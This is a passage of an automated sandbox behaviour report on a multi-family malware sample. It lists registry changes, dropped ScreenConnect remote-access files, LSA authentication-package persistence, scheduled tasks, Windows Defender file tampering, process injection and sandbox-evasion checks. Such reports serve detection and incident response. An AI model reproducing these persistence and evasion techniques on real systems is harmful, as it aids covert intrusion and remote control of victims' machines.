description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800660036003300610038003200660066006100660039006600390033006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 msiexec.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\ukozrnyo.tmp ScreenConnect.ClientService.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\ukozrnyo.newcfg ScreenConnect.ClientService.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 1656 TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE 2324 rapes.exe 1040 rapes.exe 2880 e9ea3a76fa.exe 4912 rapes.exe 4268 2983c11b74.exe 2856 05be0399a2.exe 5460 ae9ab2f9a7.exe 6660 0af0a2f978.exe 7060 50981a7f32.exe 6540 8ffa067850.exe 2532 e2a57b0b34.exe 6288 1310185143.exe 5460 88e128475c.exe 6140 rapes.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 1332 set thread context of 3004 1332 gron12321.exe 288 PID 1764 set thread context of 444 1764 alex1dskfmdsf.exe 308 PID 7060 set thread context of 6500 7060 50981a7f32.exe 359 PID 6540 set thread context of 6712 6540 8ffa067850.exe 361 PID 2532 set thread context of 4008 2532 e2a57b0b34.exe 364 PID 6288 set thread context of 7012 6288 1310185143.exe 366 PID 7088 set thread context of 6892 7088 842890bd89.exe 372 PID 7060 set thread context of 4340 7060 EPTwCQd.exe 382 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe.config msiexec.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe msiexec.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe msiexec.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File created C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Client.dll msiexec.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe -
Drops file in Windows directory 17 IoCs
description ioc Process File opened for modification C:\Windows\Installer\e5894aa.msi msiexec.exe File created C:\Windows\Installer\SourceHash{0BCCD92A-879F-CC6A-5351-726E204818E7} msiexec.exe File created C:\Windows\Installer\wix{0BCCD92A-879F-CC6A-5351-726E204818E7}.SchedServiceConfig.rmi MsiExec.exe File created C:\Windows\Installer\{0BCCD92A-879F-CC6A-5351-726E204818E7}\DefaultIcon msiexec.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Installer\e5894aa.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI95C4.tmp msiexec.exe File created C:\Windows\Tasks\rapes.job TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE File opened for modification C:\Windows\Installer\{0BCCD92A-879F-CC6A-5351-726E204818E7}\DefaultIcon msiexec.exe File opened for modification C:\Windows\Installer\MSIABBA.tmp msiexec.exe File created C:\Windows\Installer\e5894ac.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI9594.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI999D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAC28.tmp msiexec.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4324 sc.exe 2648 sc.exe 4972 sc.exe 1228 sc.exe 4788 sc.exe 4028 sc.exe 4972 sc.exe 4452 sc.exe 4500 sc.exe 2172 sc.exe 1656 sc.exe 752 sc.exe 2288 sc.exe 4504 sc.exe 4864 sc.exe 4548 sc.exe 1040 sc.exe 3748 sc.exe 4128 sc.exe 1876 sc.exe 2864 sc.exe 1244 sc.exe 232 sc.exe 4968 sc.exe 4008 sc.exe 2568 sc.exe 1388 sc.exe 3012 sc.exe 1876 sc.exe 2648 sc.exe 2580 sc.exe 3168 sc.exe 1324 sc.exe 2148 sc.exe 5060 sc.exe 4632 sc.exe 3488 sc.exe 1300 sc.exe 3348 sc.exe 3180 sc.exe 4504 sc.exe 4028 sc.exe 5040 sc.exe 872 sc.exe 2864 sc.exe 3816 sc.exe 4500 sc.exe 3204 sc.exe 3596 sc.exe 1452 sc.exe 4840 sc.exe 3092 sc.exe 1816 sc.exe 440 sc.exe 836 sc.exe 4528 sc.exe 3892 sc.exe 4968 sc.exe 5028 sc.exe 3816 sc.exe 4320 sc.exe 3440 sc.exe 3196 sc.exe 4320 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PowerShell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 7ef3f93a66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 50981a7f32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1310185143.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e9ea3a76fa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 05be0399a2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 88e128475c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A9cowK5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ScreenConnect.ClientService.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8ffa067850.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A9cowK5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7ef3f93a66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e269e6c0d6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 7ef3f93a66.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ae9ab2f9a7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e2a57b0b34.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d5ce09794.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2983c11b74.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0af0a2f978.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bell_Setup16.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 389dc2db95.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000003061842c4a1469410000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800003061842c0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809003061842c000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d3061842c000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000003061842c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ScreenConnect.WindowsClient.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ScreenConnect.WindowsClient.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 3208 timeout.exe 5012 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 4368 taskkill.exe 3368 taskkill.exe 3032 taskkill.exe 2004 taskkill.exe 1952 taskkill.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.WindowsClient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.WindowsClient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.WindowsClient.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\28 msiexec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ScreenConnect.ClientService.exe -
Modifies registry class 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\UseOriginalUrlEncoding = "1" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings rapes.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A29DCCB0F978A6CC351527E60284817E msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE} msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\ProductName = "ScreenConnect Client (f63a82ffaf9f93d1)" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\PackageCode = "A29DCCB0F978A6CC351527E60284817E" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\Version = "402915332" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\URL Protocol msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A29DCCB0F978A6CC351527E60284817E\Full msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\ProductIcon = "C:\\Windows\\Installer\\{0BCCD92A-879F-CC6A-5351-726E204818E7}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings firefox.exe Set value (str) 